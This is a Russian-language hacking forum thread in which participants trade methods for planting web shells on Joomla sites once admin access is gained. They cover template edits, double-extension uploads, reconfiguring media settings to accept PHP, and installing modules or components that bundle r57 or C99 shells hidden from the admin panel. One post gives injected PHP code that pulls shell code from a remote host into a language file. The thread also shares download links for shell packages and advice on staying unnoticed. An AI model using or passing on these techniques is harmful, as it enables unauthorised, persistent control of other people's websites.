У меня такой вопрос:
Пытаюсь подлить шелл в Joomla с помошью JoomlaXplorer, и пищет что сейчас стоит режим фаил типа нужно переключится в в ftp режим:
Current mode: file. You could switch to ftp mode.
естествено фтп ака я не знаю, какие еще есть способы заливки шелла в Joomla?

через редактирование шаблонов, через заливку медиа файлов, через заливку _своего_ компонента/темы/мамбота с шеллом, через заливку картинки с шеллом и последующим инклудом (если прокатит)
https://forum.antichat.ru/thread39801.html

ЗЫ для заливки компонента/темы/мамбота надо составлять xml файл, чтоб его нормально обработала джумла. берёшь его из любого компонента/темы/мамбота и редактируешь под свои нужды

Пасибо, но через медия файлы там же фильтр стоит на расширения, а где ставить допустимые расширения я не нашол(на бразильском все(португальском), без инглиша), и инклюдов нету для картинки.
Ладно буду пробывать через стили или шаблоны.
Пасибо еще раз.

лей через JoomXplorer в папку images. Просто на ту папку куда ты льешь не хватает прав!

Как?
Current mode: file. You could switch to ftp mode.
Я вообше ни чего не лил просто пытался запустить JoomXplorer. Права есть на всех дирах 0777.

wmv файлы заливаются? заливай шелл с расширением .php.wmv

А вобще в джумле я всегда через шаблоны заливал

Инклюдов нету, че мне потом с ним делать?

Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):

заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:

z:/home/test1.ru/www/language/english.php

он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Экранируем эту строчку и дописываем подарок:

if($HTTP_GET_VARS['a']==1)
{
$file = file('http://адрес твоего сайта с шеллом/shell.txt');
$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта
for ($i = 0; $i < count($file); $i++)
{
fputs($file2, $file[$i]);
}
fclose($file2);
}

// no direct access
//defined( '_VALID_MOS' ) or die( 'Restricted access' );

Дальше переходим по линке:

http://test1.ru/language/english.php?a=1

И получаем шелл:

http://test1.ru/language/shell.php

P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд.

архивчик http://slil.ru/25824397
это мой модуль шелл устанавливать как обычный модуль
http://localhost/joomla/administrator/index2.php?option=com_installer&element=module
шелл будет тут
http://localhost/joomla/modules/mod_j_news.php?module=joomla

Блин, шелл я давно залил через шаблонны, и здесь отписался как раз перед поста Grey, но какая то редиска его удалила, но все равно сенск за помошь ВСЕМ.

архивчик http://slil.ru/25282464
это мой модуль шелл устанавливать как обычный модуль
http://localhost/joomla/administrator/index2.php?option=com_installer&element=module
шелл будет тут
http://localhost/joomla/modules/mod_j_news.php?module=joomla

не получается :(
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?

не получается :(
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?

ты весь архив загружал ?
>>XML setup file is not for a "component" ты пытался установить компонент а не модуль, тебе сюда administrator/index2.php?option=com_installer&element=module
1) mod_r.zip не распаковывай так и отправляй, для установки модуля на запись должны бать доступны паки media, administrator/modules, modules
2) установи компонент com_joomlaxplorer(http://slil.ru/25475840) это файловый менеджер, для установки компонента должны быть доступны на запись папки media, administrator/components, components, images/stories

в двишках жомла или мамбо чтобы установить компонент или модуль они должны быть в архиве обычно zip в котором должен быть xml файл в котором и расписана вся установка

ЗЫ. если не получится залить шелл пишы в личку

chekist, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.

вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
с админки его не видно, соответственно НЕ удаляется

[COLOR=DeepSkyBlue]http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется

AciD_FreaK
>>это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.
а я что написал, я выкладывал модуль и устанавливать его надо как модуль, находились умники которые не знали как его устанавливать увидив архив они начинали его распаковывать

и чем тебе не нравится r57?

народ!!! можно ли както подругому залить шел через админкуджомлы ?! А то когда пробуеш через редактирование языка или установки модуля требует Логин и Пароль к Ftp!!!

__https://forum.antichat.ru/showpost.php?p=593795&postcount=14

__https://forum.antichat.ru/showpost.php?p=593795&postcount=14
сенкс , но проблема в этом

http://img300.imageshack.us/img300/2544/joomlamk4.jpg

Все просто. Ты льешь старую компоненту в новую Joomla 1.5 . Лучше заливай шелл через шаблон.

В крайнем случае можешь включить плагин для поддержки старых компонентов. :)

если не понял - стукни в ПМ, со скринами объясню :)

Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):

заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:

z:/home/test1.ru/www/language/english.php

он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):

// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );

Экранируем эту строчку и дописываем подарок:

if($HTTP_GET_VARS['a']==1)
{
$file = file('http://адрес твоего сайта с шеллом/shell.txt');
$file2 = fopen("shell.php", "w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта
for ($i = 0; $i < count($file); $i++)
{
fputs($file2, $file[$i]);
}
fclose($file2);
}

// no direct access
//defined( '_VALID_MOS' ) or die( 'Restricted access' );

Дальше переходим по линке:

http://test1.ru/language/english.php?a=1

И получаем шелл:

http://test1.ru/language/shell.php

P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд.

Я не понимаю с чем связано, но запуская шелл постоянно получаю ошибку 500 Internal Server Error, поэтому загружаю шелл прямо в english.php, который вызывается с определенными параметрами в GET-запросе:

if ($_GET['xek']=='ontechad'){
// r57
}

www.site.com/language/english.php?xek=ontechad

вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
с админки его не видно, соответственно НЕ удаляется

[COLOR=DeepSkyBlue]http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется
А как его удалить? Там есть кнопка self destruct, но мне кажется удалится только пхп-шелл, а папка /components/com_articles останется. Как бы удалить и ее, и ее содержимое?

Желательно без заливки еще одного шелла.

Есть админка. как залить шел если только в этих папках стоят права на запись ?
images/ Доступен для записи
Каталог кешa /usr/home/***/www/www.*.ua/cache/ Доступен для записи
media/ Доступен для записи
На хосте стоит joomlaXplorer (1,6,2). через него не идет залить шел так как он хочет переключиться в фтп моде. Версия джумлы 1,0,13

Есть админка. как залить шел если только в этих папках стоят права на запись ?
images/ Доступен для записи
Каталог кешa /usr/home/***/www/www.*.ua/cache/ Доступен для записи
media/ Доступен для записи
На хосте стоит joomlaXplorer (1,6,2). через него не идет залить шел так как он хочет переключиться в фтп моде. Версия джумлы 1,0,13

В 1.0.13 надо пробовать, а в 1.5.* в images можно так залить :

-в админке идем в site->global configuration->system->media settings

-добавляем в legal extensions (file types) тип файлов php

-изменяем Restrict Uploads на No

-изменяем Check MIME Types на No

-добавляем в Legal Image Extensions тип файлов php

-изменяем Enable Flash Uploader на No

-применяем изменения конфигурации Apply

-идем в site->media manager->upload file загружаем шелл,путь до него будет site.com/images/shell.php

Всё проще, гораздо проще, первый же пост на ачате в уязвимостях по джумле дает ответ на этот вопрос, причем недавно проверено - самый тупой способо, в лоб, но 100% действенный:

Устанавливайте плагин JoomlaXplorer 2.0, льете шелл, удаляете JoomlaXplorer 2.0. Всё

проблемка что нет прав на заливку ни в одну папку... :(

проблемка что нет прав на заливку ни в одну папку... :(

https://forum.antichat.ru/showpost.php?p=986059&postcount=121

на локалке прокатило

По сабжу:
есть доступ к админке жумла, файлы редактировать не дает,

Установка нового компонента:
media/ Недоступен для записи
administrator/components/ Недоступен для записи
components/ Недоступен для записи
images/stories/ Недоступен для записи

Установка новых модулей:
media/ Недоступен для записи
administrator/modules/ Недоступен для записи
modules/ Недоступен для записи

Установка новых мамботов:
media/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи

Установить новый язык сайта:
media/ Недоступен для записи
language/ Недоступен для записи

Установить новый шаблон (админки):
media/ Недоступен для записи
administrator/templates/ Недоступен для записи
templates/ Недоступен для записи
images/stories/ Недоступен для записи

Установить новый шаблон (сайта):
media/ Недоступен для записи
administrator/templates/ Недоступен для записи
templates/ Недоступен для записи
images/stories/ Недоступен для записи

НО
есть доступ к бд через пхпму админ (доступ только для данной бд). Можно ли чтонибудь сделать?

P.s. версия жумлы Joomla! 1.0.12

маловероятно
если только что то с соседями мутить

Можно через инсталл компонентов, грузишь СРАЗУ тупо шелл, прямо вот так: shell.php со своего винта. Будут в папке /media

Называться будут также, как у тебя на винте

Хотя хз, как там у тебя, т.к. все запрещено на запись. МОжет в /tmp упадут

Можно через инсталл компонентов, грузишь СРАЗУ тупо шелл, прямо вот так: shell.php со своего винта. Будут в папке /media

Называться будут также, как у тебя на винте

Хотя хз, как там у тебя, т.к. все запрещено на запись. МОжет в /tmp упадут

Народ на сайте впервые беспокоит сей момент: как залить шелл в joomla не имея доступа к админке??
версия joomla 1.5.9 или есть иной метод получить пароль?
Заранее спасибо

Итак, есть Joomla! 1.0.15 Stable
В ней:
This web host is running a particular implementation of PHP safe mode which places severe limitations on what files the Mambo admin interface can create. File uploads will currently not install correctly unless you select the FTP Assist option below. FTP Assist uses your site admin’s FTP account to copy, make directories, and set permissions for newly installed components, modules, or templates. This also allows all file ownership to be retained by the site admin uid which can improve security and alleviate site maintenance problems thru the FTP client later. To use FTP Assist, click the ‘Use FTP Assist’ checkbox below and provide your FTP account username, password, and host address in the provided test boxes. The password is not retained by Mambo for security reasons.

If the ‘use FTP Assist’ checkbox is disabled below, then your current PHP implementation on this host does not support FTP. The only other alternative for installation is to perform a manual install using the Install from directory option below. You will need to use an ftp client on your PC to transfer the uncompressed component or module installation files (using a zip utility) to a temporary directory on this site. You will need to view the module/component/template's .xml installation directive file to determine what and where to manually create (thru your ftp client) any new installation subdirectories and where to copy the files from the temporary install directory over to the proper destination areas, just as the .xml file would direct this installer script. After completing this manual process, proceed with the Install from directory option below. The script will verify that all required files and directories have been properly copied by you. Then the required Mambo database changes will be performed to complete installation. Note: you will need to enable write access to your components subdirectory as 755 at a minimum (ie. owner: rwx group: r-x everyone: r-x) or 777 (all rwx)
Короче сэйф он.
и
media/ Writeable
administrator/components/ Writeable
components/ Writeable
images/stories/ Writeable
Никакие модули не подгружает, пишет:
ERROR: Could not find an XML setup file in the package.
Installation file not found:
/home/*/domains/*/htdocs/media/install_4b4c7be722601/